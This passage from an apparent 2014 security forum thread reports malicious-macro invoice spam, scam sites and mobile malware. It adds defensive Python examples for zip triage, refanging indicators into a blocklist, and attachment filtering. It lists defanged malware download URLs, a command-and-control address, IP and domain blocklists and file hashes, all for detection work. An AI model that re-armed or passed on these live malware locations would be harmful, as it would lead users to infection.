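def triage_zip(blob):
    """One finding per member: real type, sha256, BLOCK/allow verdict and reasons."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info)
            ext, inner = split_name(info.filename)
            kind = sniff(data)
            reasons = []
            if kind in ("pe-executable", "dos-executable"):
                reasons.append("content is a Windows executable; its icon is whatever its resources say")
            if ext in EXEC_EXT:
                reasons.append(f"executable extension {ext}")
            if inner in DOC_EXT:
                reasons.append(f"double extension {inner}{ext}: shows as '{inner}' when known extensions are hidden")
            if ext == ".pdf" and kind != "pdf":
                reasons.append(f"named .pdf but content is {kind}")
            findings.append({
                "name": info.filename, "size": len(data), "type": kind,
                "sha256": hashlib.sha256(data).hexdigest(),
                "verdict": "BLOCK" if reasons else "allow", "reasons": reasons,
            })
    return findings

def build_sample_zip():
    """Constructed stand-in for the INTERAC/WUBS lures: a minimal MZ/PE stub
    named like a PDF, plus a harmless text file. No real malware involved."""
    e_lfanew = 0x40
    stub = (b"MZ" + b"\x00" * 58 + e_lfanew.to_bytes(4, "little")
            + b"PE\x00\x00" + b"\x00" * 100)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("INTERAC_pmt_11062014_0345875.pdf.exe", stub)
        zf.writestr("readme.txt", "nothing to see here")
    return buf.getvalue()

if __name__ == "__main__":
    for finding in triage_zip(build_sample_zip()):
        print(finding["verdict"], finding["name"], finding["type"], finding["sha256"][:16], finding["reasons"])
```

The sha256 is what the VirusTotal links in these posts are keyed on, so a hit here can be checked against them without detonating anything. On the endpoint side, the "show known file extensions" advice corresponds to Explorer's `HideFileExt` value under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced` being set to 0; with it left at the default of 1 the `.exe` in the sample name above is simply not displayed.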
AplusWebMaster
2014-11-07, 15:10
FYI...
'Dark market' websites seized in U.S., European busts - Silk Road 2.0
- http://www.reuters.com/article/2014/11/07/us-europol-cybersecurity-arrests-idUSKBN0IR0Z120141107
Nov 7, 2014
> http://s4.reutersmedia.net/resources/r/?m=02&d=20141107&t=2&i=989590213&w=580&fh=&fw=&ll=&pl=&r=LYNXMPEAA60EZ
"U.S. and European authorities on Friday announced the seizure of more than 400 secret website addresses and arrests of 16 people in a sweep targeting black markets for drugs and other illegal services. The developments were announced a day after prosecutors in New York unveiled criminal charges against the alleged operator of underground online drug marketplace Silk Road 2.0. U.S. authorities called the global sweep the largest law enforcement action to date against illegal websites operating on the so-called Tor network, which lets users communicate anonymously by masking their IP addresses... Europol, in a statement, said U.S. and European cyber crime units, in a sweep across 18 countries, had netted $1 million worth of Bitcoin, the digital currency, 180,000 euros in cash, silver, gold and narcotics. The more than 400 websites and domains seized on Thursday existed on the Tor network and were used by dozens of online marketplaces where such things as child pornography, guns and murder-for-hire could be purchased, authorities said. Sixteen people operating illegal sites were arrested in addition to the defendant in the Silk Road 2.0 case, Europol added, without specifying the charges... On Thursday, U.S. authorities said they had shut down Silk Road 2.0, a successor website to underground online drugs marketplace Silk Road. Blake Benthall, the alleged operator of Silk Road 2.0, was arrested and charged with -conspiracy- to commit drug trafficking, computer hacking, money laundering and other crimes. Troels Oerting, head of Europol's cybercrime center, said the operation knocked out a significant part of the infrastructure for illegal online drugs and weapons trade in the countries involved... The websites had complete business models, Oerting said, and displayed what they sold, including drugs, weapons, stolen credit cards..."
- http://www.fbi.gov/newyork/press-releases/2014/operator-of-silk-road-2.0-website-charged-in-manhattan-federal-court
___
Fake invoice SPAM - malicious Word macro attachment
- http://blog.dynamoo.com/2014/11/sue-morckage-this-email-contains.html
7 Nov 2014 - "This -fake- invoice spam (all pretending to be from someone called Sue Morckage) comes with a malicious Word macro attachment.
From: Sue Morckage
Date: 7 November 2014 13:10
Subject: inovice 9232088 November
This email contains an invoice file attachment
The number in the subject is random, and attached is a document with the same format name (in this example invoice_9232088.doc). So far I have seen two attachments both with VT detection rates of 4/54 [1] [2]... which contains one of two malicious macros... which then go and download a binary from one of the following locations:
http ://ksiadzrobak .cba .pl/bin.exe > https://www.virustotal.com/en/ip-address/95.211.144.89/information/
http ://heartgate .de/bin.exe > https://www.virustotal.com/en/ip-address/81.169.145.156/information/
This binary gets copied into %TEMP%\AKETVJIJPZE.exe and it has a VirusTotal detection rate of just 1/54*, but so far automated analysis tools... are inconclusive as to what this does, however the payload is likely to be Cridex."
* https://www.virustotal.com/en/file/e479a2b6ef7098403c8e45d0d88be37856bb2301347f989a1708055d94c2227e/analysis/1415369050/
1] https://www.virustotal.com/en/file/7ce09f9a865bc889dd4737c1b3f5073d4512767d68604ea5913b59387f293844/analysis/1415365398/
2] https://www.virustotal.com/en/file/0db27aefbfae00b2658a360ec12445aabf0993fac6750b9c99b12e98bc3ebe4b/analysis/1415368736/
- http://myonlinesecurity.co.uk/sue-morckage-inovice-0394508-november-word-doc-malware/
7 Nov 2014
> https://www.virustotal.com/en/file/6ab64b9e14c7d8ad31794f36153276d8f50310e39e04a82935a573b8a0a982f1/analysis/1415372037/
___
Fake job sites ...
- http://blog.dynamoo.com/2014/11/europejobdayscom-and-other-fake-job.html
7 Nov 2014 - "This tip* from @peterkruse about a spam run pushing -fake- jobs using the domain europejobdays .com caught my eye, especially the mention of the nameservers using the stemcellcounseling.net domain. These -fake- job sites tend not to go alone, and a look at the other domains using the same nameservers comes up with a whole list of related -fake- sites... avoid**. You should be aware that the jobs on offer are actually part of some criminal enterprise such as money laundering or parcel reshipping. You can see a video that explains the parcel reshipping scam and the role of the parcel mule below:
> https://www.youtube.com/watch?v=UbSCXqL1jL4
* https://twitter.com/peterkruse/status/530628073264517120
** (Long list at the dynamoo URL at the top.)
___
Fake Tech Support website infections ...
- https://blog.malwarebytes.org/exploits-2/2014/11/tech-support-website-infects-your-computer-before-you-even-dial-in/
Nov 6, 2014 - "... Many websites that are promoted via ads on search engines or pop ups often turn out to be impostors or crooks and it doesn’t matter whether they are overseas or here in the U.S. This time around, our focus is on a company that seems to want a big piece of the U.S. market and boasts their infrastructure as being 'ahead of time technology equipment' while 'your computer issues are fixed securely'. This couldn’t be further from the truth. For some reason, looking at the site gives an impression of déjà-vu. Perhaps it is the template and stock photos typically used by many overseas tech support companies... While we shouldn’t judge a book by its cover, there is something really wrong that happens when you visit their website:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/blocked-1024x817.png
... One of the html files (a banner) contains a malicious script loading a page from a compromised website. This site contains an -iframe- with a dynamic URL that silently -redirects- the user to the Angler Exploit Kit... In this case, if your system was outdated and you had no security solution, you would have been victim of the fileless infection followed by additional malware... This drive-by infection almost seems like the perfect segue into a malware diagnostic. In fact, right from the beginning of our call, the technician already assumed our computer was infected... Sadly, the service provided by American Tech Help is not up to par either. The technicians are quick to point out errors and ‘hackers’ that have compromised your computer by simply showing the (typical) warnings displayed in the Windows Event Viewer:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/eventviewer-1024x728.png
... here’s the problem: Before browsing to their site and calling them up we had made sure our computer was fully patched. So while the site attempted to exploit our system, it never succeeded. So the technician’s report is completely -bogus- . It is quite possible that the tech support site was simply hacked because of poor security practices and that their owners aren’t aware of it. Or perhaps they don’t even care until the major browsers start blacklisting them and they see their traffic take a dive... There was a time when we could say that as long as you didn’t let scam artists take remote control of your computer, you were fine. Now the mere fact of browsing to one of their sites could be the beginning of some real troubles. It is -not- entirely surprising that such sites are dangerous to visit: they are built quickly, on the cheap and with little to no maintenance. This is just a recipe for disaster as any good website owner would tell you. For more information on tech support scams and general advice, please check out our Tech Support -Scams- resource page*."
* https://blog.malwarebytes.org/tech-support-scams/
- http://www.symantec.com/connect/blogs/when-tech-support-scams-meet-ransomlock
7 Nov 2014 - "A technical-support phone scam uses Trojan.Ransomlock.AM to lock the user’s computer and trick them into calling a technical help phone number to resolve the issue...
Top ten ransomware detections as of 11-07-14:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Ransomlock%202.png
Fake BSoD lock screen:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Ransomlock%203%20edit.png ..."
- http://www.ftc.gov/news-events/press-releases/2014/10/ftcs-request-court-shuts-down-new-york-based-tech-support-scam
:mad: :fear:
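The posts above (and many that follow) publish their indicators "defanged" (http ://ksiadzrobak .cba .pl/bin.exe, hxxp ://..., bare IPs and domains in a "Recommended blocklist"), so they cannot be pasted straight into a proxy or DNS blocklist. Below is an added example, not code from dynamoo, myonlinesecurity or this forum, that normalises those styles and extracts the hosts worth blocking. The indicator lines in SAMPLE_LINES are constructed from the formats used in these posts; the BENIGN set (reporting sites such as VirusTotal that appear beside the indicators) is an assumption you would extend for your own feeds.

```python
"""Turn defanged indicators from spam write-ups into a host blocklist.

Added example (not the quoted blogs' code). Handles the defanging styles
seen in these posts: "http ://", "hxxp ://", "example .com", "1.2.3.4 /path",
"[.]" and "(dot)". Feed it indicator lines only, not free prose.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Applied in order; the last two deliberately join "cba .pl" and "host /path".
_DEFANG_SUBS = [
    (re.compile(r"hxxps?", re.I), lambda m: m.group(0).lower().replace("xx", "tt")),
    (re.compile(r"\s*(?:\[\.\]|\(\.\)|\(dot\))\s*", re.I), "."),
    (re.compile(r"\s+:\s*//"), "://"),                        # "http ://"
    (re.compile(r"\s+(?=\.)|(?<=\.)\s+(?=[A-Za-z0-9])"), ""),  # "cba .pl"
    (re.compile(r"\s+(?=/)"), ""),                            # "84.40.9.34 /kPm"
]

_URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
_IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)

# Assumption: hosts that appear in write-ups as reporting links, never as IOCs.
BENIGN = {"virustotal.com", "www.virustotal.com"}

# Constructed from the indicator formats used in the posts above.
SAMPLE_LINES = [
    "http ://ksiadzrobak .cba .pl/bin.exe",
    "http ://84.40.9.34 /kPm/PQ0Zs8L.Wtg%26/thtqJJSo%2B/LsB6v/",
    "hxxp ://vsrwhitefish .com/bankline/message.php",
    "178.254.57.146",
    "shahlart .com",
    "kurdogluhotels .com/docfiles/invoice_1211.php",
]


def refang(text: str) -> str:
    """Undo the defanging so URL parsers see a real URL/host."""
    for pattern, repl in _DEFANG_SUBS:
        text = pattern.sub(repl, text)
    return text


def extract_hosts(line: str) -> set:
    """Hosts (IPs and domains) from one refanged indicator line."""
    line = refang(line)
    hosts = set()
    for url in _URL_RE.findall(line):
        host = urlsplit(url).hostname
        if host:
            hosts.add(host.lower())
    # Bare indicators: strip URLs first so an IP inside a VT link path is not taken.
    stripped = _URL_RE.sub(" ", line)
    for ip in _IPV4_RE.findall(stripped):
        try:
            ipaddress.ip_address(ip)
            hosts.add(ip)
        except ValueError:
            pass
    for dom in _DOMAIN_RE.findall(stripped):
        if not _IPV4_RE.fullmatch(dom):
            hosts.add(dom.lower())
    return {h for h in hosts if h not in BENIGN}


def build_blocklist(lines) -> list:
    """Sorted, de-duplicated host list ready for a proxy/DNS denylist."""
    hosts = set()
    for line in lines:
        hosts |= extract_hosts(line)
    return sorted(hosts)


if __name__ == "__main__":
    for host in build_blocklist(SAMPLE_LINES):
        print(host)
```

Block at the host level rather than the full URL: the same 84.40.9.34 server is reused across several of the campaigns in this thread with different paths each time.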
AplusWebMaster
2014-11-10, 13:08
FYI...
Fake Invoice SPAM - Word doc malware
- http://myonlinesecurity.co.uk/kate-williams-invoice-6330089-november-word-doc-malware/
10 Nov 2014 - "'invoice 6330089 November' pretending to come from 'Kate Williams' with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... DO NOT follow the advice they give to enable macros to see the content... Almost all of these malicious word documents appear to be -blank- when opened in protected view mode... The email looks like:
Please find attached your November invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 6330089 Account No 5606330089.
Thanks very much
Kate Williams
10 November 2014 : invoice_6330089.doc - Current Virus total detections: 0/51*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/853b7d4967564242b80a649946c58b7cc3993940e69f17cd1c714f3380da520a/analysis/1415612495/
- http://blog.dynamoo.com/2014/11/kate-williams-invoice-8798556-november.html
10 Nov 2014 - "... the malware connecting to 84.40.9.34 (Hostway, UK)..."
1] https://www.virustotal.com/en/file/853b7d4967564242b80a649946c58b7cc3993940e69f17cd1c714f3380da520a/analysis/1415613432/
2] https://www.virustotal.com/en/file/626f380c54d2dde9ea3ae4b77d79a8a2e7ca7af118d726e8ba4c5edaf4d34462/analysis/1415613431/
84.40.9.34: https://www.virustotal.com/en/ip-address/84.40.9.34/information/
___
Fake Amazon SPAM - malware-macros
- http://net-security.org/malware_news.php?id=2912
Nov 10, 2014 - "... According to AppRiver* researchers, two distinct malware delivery campaigns impersonating e-commerce giant Amazon are currently hitting inboxes. The first one is directed at UK users, and the company has already quarantined over 600,000 of these messages. The malicious email takes the form of a 'delivery confirmation message' and carries a Word document that supposedly contains the needed information. Unfortunately for those who open the file and have -macros- enabled in Word, the action triggers the installation of a Trojan dropper that downloads additional malware aimed at harvesting login credentials for various online services, including online banking. The second campaign comes in the form of an order confirmation from Amazon .com:
> http://www.net-security.org/images/articles/amazonphish-10112014-big.jpg
... AppRiver* pointed out. Also, this campaign is less intense than the first one - the company has blocked "only" about -160,000- messages so far. The supposed 'invoice file attached' is actually a Trojan dropper that will download additional malware once the host is infected..."
* http://blog.appriver.com/2014/11/malicious-amazon-emails-aim-to-infect-holiday-shoppers
"... This is a very popular time of the year for these types of scams with so many people in shopping mode in preparation for the holidays. With many people expecting purchase confirmations and shipping confirmations with much more frequency, it increases the likelihood that people will fall for this scam. Be extra cautious this holiday shopping season and if you are suspicious of unauthorized activity on your Amazon account -never- follow the link in an email such as this, go directly to the website and check your account from there."
___
'Darkhotel malware' is targeting travelling execs via hotel WiFi
- http://www.theinquirer.net/inquirer/news/2380394/darkhotel-malware-is-targeting-travelling-execs-via-hotel-wifi
Nov 10, 2014 - "... 'Darkhotel' has been targeting travelling executives via hotel WiFi for the past four years, Kaspersky has warned, and is still active today. According to the security firm, 'Darkhotel' infects hotel networks with spying software which in turn infects the computers of targeted executives as soon as they connect to the hotel WiFi network. The executives are tricked into installing the information-stealing malware by disguising it as an update for legitimate software such as Adobe Flash, Google Toolbar or Windows Messenger. The malware then searches the computer for sensitive corporate data, cached passwords and log-in credentials..."
* https://securelist.com/blog/research/66779/the-darkhotel-apt/
Nov 10, 2014
___
Home Depot drops Windows for Mac ...
- http://www.theinquirer.net/inquirer/news/2380340/home-depot-drops-windows-for-mac-os-x-after-data-hack
Nov 10 2014 - "... Home Depot is reportedly shutting out the Windows operating system in favour of the Apple alternative as the firm continues to respond to the catastrophic breach on its systems. The hardware chain has confessed in some detail about the attack on its checkout and sales systems, and admitted to losses of data that affect tens of millions of customers... The Wall Street Journal* has more information on the Home Depot hack..."
* http://online.wsj.com/articles/home-depot-hackers-used-password-stolen-from-vendor-1415309282
"... hackers got into its systems last April by stealing a password from a vendor, opening a tiny hole that grew into the biggest retail-credit-card breach on record. On Thursday, the company announced the breach was worse than earlier thought. In addition to the 56 million credit-card accounts that were compromised, Home Depot now says around 53 million customer email addresses were stolen as well..."
___
'All Your iOS Apps Belong to Us' - FireEye
- http://www.fireeye.com/blog/technical/cyber-exploits/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
Nov 10, 2014 - "In July 2014, FireEye mobile security researchers discovered that an iOS app installed using enterprise/ad-hoc provisioning could replace another genuine app installed through the App Store, as long as both apps used the same bundle identifier. This in-house app may display an arbitrary title (like “New Flappy Bird”) that lures the user to install it, but the app can replace another genuine app after installation. All apps can be replaced except iOS preinstalled apps, such as Mobile Safari. This vulnerability exists because iOS doesn't enforce matching certificates for apps with the same bundle identifier. We verified this vulnerability on iOS 7.1.1, 7.1.2, 8.0, 8.1 and 8.1.1 beta, for both jailbroken and non-jailbroken devices. An attacker can leverage this vulnerability both through wireless networks and USB. We named this attack “Masque Attack," and have created a demo video here:
> https://www.youtube.com/watch?feature=player_embedded&v=3VEQ-bJUhPw
We notified Apple about this vulnerability on July 26... After looking into WireLurker, we found that it started to utilize a limited form of Masque Attacks to attack iOS devices through USB. Masque Attacks can pose much bigger threats than WireLurker. Masque Attacks can -replace- authentic apps, such as banking and email apps, using the attacker's malware through the Internet. That means the attacker can steal the user's banking credentials by replacing an authentic banking app with malware that has an identical UI. Surprisingly, the malware can even access the original app's local data, which -wasn't- removed when the original app was replaced. This data may contain cached emails, or even login tokens which the malware can use to log into the user's account directly. We have seen proof that this issue started to circulate. In this situation, we consider it urgent to let the public know, since there could be existing attacks that haven’t been found by security vendors. We are also sharing mitigation measures to help iOS users better protect themselves... By leveraging Masque Attack, an attacker can lure a victim to install an app with a deceiving name crafted by the attacker (like “New Angry Bird”), and the iOS system will use it to replace a legitimate app with the same bundle identifier. Masque Attack couldn't replace Apple's own platform apps such as Mobile Safari, but it can replace apps installed from the App Store. Masque Attack has severe security consequences... In one of our experiments, we used an in-house app with a bundle identifier “com.google.Gmail” with a title “New Flappy Bird”. We signed this app using an enterprise certificate. When we installed this app from a website, it replaced the original Gmail app on the phone:
> http://www.fireeye.com/blog/wp-content/uploads/2014/11/Untitled1.jpg
... Masque Attack happens completely over the wireless network, without relying on connecting the device to a computer.
-- Mitigations: iOS users can protect themselves from Masque Attacks by following three steps:
- Don’t install apps from third-party sources other than Apple’s official App Store or the user’s own organization.
- Don’t click “Install” on a pop-up from a third-party web page, as shown in Figure 1(c), no matter what the pop-up says about the app. The pop-up can show attractive app titles crafted by the attacker
- When opening an app, if iOS shows an alert with “Untrusted App Developer”, as shown in Figure 3, click on “Don’t Trust” and uninstall the app immediately..."
Figure 3:
> http://www.fireeye.com/blog/wp-content/uploads/2014/11/IMG_0001.jpg
:mad: :fear:
AplusWebMaster
2014-11-11, 14:32
FYI...
Fake 'Bank Payment' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/11/nazarethcarecom-accounts-finchley-bank.html
11 Nov 2014 - "This -fake- invoice spam pretending to be from a care home in the UK comes with a malicious attachment.
From: Accounts Finchley [accounts.finchley@ nazarethcare .com]
Date: 11 November 2014 10:34
Subject: Bank Payments
Good Afternoon,
Paying in sheet attached
Regards
Sandra Whitmore
Care Home Administrator
Nazareth House
162 East End Road
East Finchley
London...
Nazareth Care Charitable Trust...
... The "from" field in an email is trivially easy to fake, as it looks like the body text may have been stolen from a compromised mailbox. Attached is a file 2014_11_07_14_09_19.doc which comes in two versions both with low VirusTotal detection rates [1] [2]. If macros are enabled then one of two macros... which then downloads a file from one of the following locations:
http ://www.grafichepilia .it/js/bin.exe
http ://dhanophan .co.th/js/bin.exe
This file gets copied to %TEMP%\HZLAFFLTDDO.exe and it has a VirusTotal detection rate of 3/53*. The Malwr report shows it phoning home to:
http ://84.40.9.34 /kPm/PQ0Zs8L.Wtg%26/thtqJJSo%2B/LsB6v/
It also drops a DLL identified by VirusTotal** as Dridex."
1] https://www.virustotal.com/en/file/ba33302cdcb892cbc57b502c88775528aefed879d7515d468faea193436e46e9/analysis/1415703941/
2] https://www.virustotal.com/en/file/0a5f29b5ec667d27d1539521514dfb079b58449065df9aefc654fb16f1b83e1d/analysis/1415703952/
* https://www.virustotal.com/en/file/4c6dc38c88226dc461faaa7583ac4e53df822c919de7033428478f803f6d9ea8/analysis/1415704632/
** https://www.virustotal.com/en/file/110f884be52e0ef66f339fa122161f8e4fa66f7cd1f4a412d6ed0cd124d3f915/analysis/1415705610/
- http://myonlinesecurity.co.uk/bank-payments-pretending-come-accounts-finchley-word-doc-malware/
11 Nov 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/Accounts-Finchley.png
___
Fake 'Duplicate Payment' SPAM – Word doc malware
- http://myonlinesecurity.co.uk/duplicate-payment-received-word-doc-malware/
11 Nov 2014 - "'Duplicate Payment Received' pretending to come from various random names with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good afternoon,
I refer to the above invoice for which we received a bacs payment of £660.94 on 10th November 14. Please be advised that we already received payment for this invoice, by bacs on 30th October 2014.
I will therefore arrange a refund, please confirm preferred method, cheque or bacs transfer. If a cheque please confirm the name the cheque should be made out too or if bank transfer, please advise bank details.
If you have any queries regarding this matter, please do not hesitate to contact me.
I look forward to hearing from you .
Many thanks
Lenora Dunn
Accounts Department
11 November 2014 : De_VY955279R.doc - Current Virus total detections: 2/55*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e2a53e440bf4b5528d3ddd751b23410f91fa1fd27ef830b3493497c63b89a9bd/analysis/1415704035/
- http://blog.dynamoo.com/2014/11/duplicate-payment-received-spam-has.html
11 Nov 2014
... Recommended blocklist:
178.254.57.146
213.140.115.29
62.76.180.133
62.76.189.108 "
___
Trojan SMS Found on Google Play
- https://blog.malwarebytes.org/mobile-2/2014/11/trojan-sms-found-on-google-play/
Nov 11, 2014 - "... this one slipped under Google Play’s radar, but an SMS Trojan app with the package name com.FREE_APPS_435.android, which claims to be a download for wallpapers, videos, and music, is actively on the Google Play store (at least at the time of this writing it was).
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/ScreenShot1.jpg
... This tactic has been seen since malware started appearing on Android devices. If you visit the developer’s website from the link provided on the Google Play page, it takes you to a page with two banners and a couple of links.
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/ScreenShot3.jpg
... Google Play has been notified of the existence of this SMS Trojan. The last update of this app was August 20th 2013, which was most likely the date it was added to the Play store. Many variants of this Trojan have been seen that are not currently on the Play store. We flag this Trojan and similar variants as Android/Trojan.SMS.Agent. This is proof that Google Play isn’t perfect at alleviating all malware."
___
Predator Pain and Limitless... the Fraud
- http://blog.trendmicro.com/trendlabs-security-intelligence/predator-pain-and-limitless-behind-the-fraud/
Nov 11, 2014 - "ZeuS/ZBOT has been one of the most talked about malware families for several years, and with good reason... It is estimated that ZBOT has enabled cybercriminals to steal more than $100 million US dollars since its inception... the Commercial Crime Bureau of Hong Kong Police Force estimates this kind of fraud has netted attackers up to $75 million US dollars in the first half of this year, from Hong Kong alone... cybercriminals in a single city, within six-months, equaled all the losses from ZBOT up to the present. Unlike Zeus, Predator Pain and Limitless are relatively simple keyloggers. They indiscriminately steal web credentials and mail client credentials, as well as capturing keystrokes and screen captures. The output is human readable... clever targeting, patience, cunning and simple keyloggers have netted these cybercriminals large sums of money. These highlight that cybercrime activities are dependent not only on the sophistication of the tools used, but on how well organized the entire scheme is... The following graphs show the distribution of the victims that we observed, both by country and by industry:
Predator Pain/Limitless Victims by Country:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/Country-Distribution-01.jpg
Predator Pain/Limitless Victims by Industry:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/Industry-Distribution-01.jpg
- http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cybercrime-to-cyberspying-limitless-keylogger-and-predator-pain/
"... The cybercriminals instead went after SMBs (small and medium-sized businesses), which led us to realize how vulnerable they are to the threat..."
:mad: :fear:
AplusWebMaster
2014-11-12, 16:01
FYI...
Fake 'Police' SPAM ...
- http://blog.dynamoo.com/2014/11/exchange-house-fraud-police-headquaters.html
12 Nov 2014 - "I got a lot of these yesterday..
From: omaniex@ investigtion .com
Subject: Exchange House Fraud (Police Headquaters)
please note that your attension is needed in our station, as we got information on this fraud information as transactions detailed in attachment. kindly acknowledge this letter and report to our office as all report and contact details are in attachment. failure to this you will be held responsible.
Note: come along with your report as it will be needed
regards,
Police headquarters.
Investigtion dept.
Attached is a file EXCH DETAILS PR 7777709.zip which contains two files:
7 TRANSACTION RPPP 00000123-PDF.jar
PR0JECT INVESTIGATI 011111-PDF.jar
... malicious application written in Java (top tip - if you have Java installed on your computer, remove it. You probably -don't- need it). It has a VirusTotal detection rate of 7/55*..."
* https://www.virustotal.com/en/file/bd15776998194aa3a1be49a9eeb982fcb69cf57c76cd7319e1553b929b4f6349/analysis/1415792881/
___
ADP Past Due Invoice Spam
- http://threattrack.tumblr.com/post/102455898273/adp-past-due-invoice-spam
Nov 12, 2014 - "Subjects Seen:
ADP Past Due Invoice#54495150
Typical e-mail details:
Your ADP past due invoice is ready for your review at ADP Online Invoice Management .
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Review your ADP past due invoice here.
Important: Please do not respond to this message. It comes from an unattended mailbox.
Malicious URLs:
kurdogluhotels .com/docfiles/invoice_1211.php
kevalee .ac.th/docfiles/invoice_1211.php
Malicious File Name and MD5:
invoice1211_pdf27.zip (05FC7646CF11B6E7FB124782DAF9FB53)
invoice1211_pdf.exe (78CF05FAA79B41B4BE4666E3496D1D54)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4eb2bf63ec6433cda6fde59dcbf32fc9/tumblr_inline_nexql2Bx451r6pupn.png
Tagged: ADP, Upatre
- http://blog.dynamoo.com/2014/11/adp-past-due-invoice39911564-spam.html
12 Nov 2014
... Recommended blocklist:
188.165.206.208
shahlart .com
mboaqpweuhs .com "
- http://www.threattracksecurity.com/it-blog/adp-past-due-invoice-spam/
Nov 13, 2014 - "... the Upatre Trojan, which in turn downloaded and decrypted the banking-credential-stealing Trojan Dyre..."
Screenshot: http://www.threattracksecurity.com/it-blog/wp-content/uploads/2014/11/ADP-Past-Due-Invoice.png
94.23.49.77: https://www.virustotal.com/en/ip-address/94.23.49.77/information/
:mad: :fear:
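Several of the campaigns above share one delivery pattern: a Word document whose macro downloads bin.exe (the Sue Morckage, Kate Williams and Accounts Finchley runs), a .zip wrapping an executable or a Java .jar named to look like a PDF (the ADP and "Police Headquarters" runs). A mail gateway can catch most of this without any signatures. Below is an added example, not code from dynamoo, ThreatTrack or the other quoted blogs, of an attachment policy check: it rejects extensions that have no business arriving by email, looks inside OOXML files for a VBA project regardless of the extension on the file, looks one level inside .zip archives, and quarantines legacy binary .doc files for inspection (telling whether an OLE .doc contains macros needs a real OLE parser, which is outside this example). The file names and contents below are constructed; the BLOCKED_EXTENSIONS set is an assumed policy, not one the posts prescribe.

```python
"""Attachment policy check for the delivery patterns in these posts.

Added example, not the quoted blogs' code. Verdicts: 'block', 'review', 'allow'.
Sample attachments are constructed in memory so the module runs offline.
"""
import io
import zipfile

# Assumed perimeter policy: none of these should arrive by email.
BLOCKED_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".jar", ".js", ".vbs",
                      ".docm", ".xlsm", ".pptm"}
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls container
ZIP_MAGIC = b"PK\x03\x04"


def _extension(filename: str) -> str:
    """Lower-cased final extension, '' if none ('invoice1211_pdf.exe' -> '.exe')."""
    name = filename.lower().rstrip(". ")
    return "." + name.rsplit(".", 1)[1] if "." in name else ""


def has_vba_project(data: bytes) -> bool:
    """True if an OOXML (zip) document carries a VBA project part.

    Word/Excel store macros as word/vbaProject.bin or xl/vbaProject.bin; a
    renamed .docm still has the part, so this catches macros behind a .docx name.
    """
    if not data.startswith(ZIP_MAGIC):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(n.lower().endswith("vbaproject.bin") for n in zf.namelist())
    except zipfile.BadZipFile:
        return False


def classify_attachment(filename: str, data: bytes, depth: int = 0):
    """Return (verdict, reason) for one attachment, recursing one level into .zip."""
    ext = _extension(filename)
    if ext in BLOCKED_EXTENSIONS:
        return "block", f"extension {ext} is not accepted by email"
    if has_vba_project(data):
        return "block", f"OOXML document contains a VBA project despite extension {ext}"
    if ext == ".zip" and data.startswith(ZIP_MAGIC):
        if depth >= 1:
            return "review", "nested archive; inspect manually"
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for member in zf.namelist():
                    verdict, reason = classify_attachment(member, zf.read(member), depth + 1)
                    if verdict != "allow":
                        return verdict, f"archive member {member!r}: {reason}"
        except zipfile.BadZipFile:
            return "review", "corrupt or unreadable zip archive"
    if data.startswith(OLE_MAGIC):
        # Legacy binary .doc: macros live in the OLE 'Macros' storage and need an
        # OLE parser to confirm, so hold it rather than guess.
        return "review", "legacy OLE document; check for macros before delivery"
    return "allow", "no policy match"


# ---- constructed samples (not real malware) ----------------------------------
def make_ooxml(with_macro: bool) -> bytes:
    """Minimal Word-style zip, optionally with a (dummy) vbaProject.bin part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", OLE_MAGIC + b" dummy vba project")
    return buf.getvalue()


def make_zip(members: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


SAMPLES = {
    "invoice_6330089.doc": OLE_MAGIC + b"\x00" * 16,
    "00000293.docm": make_ooxml(True),
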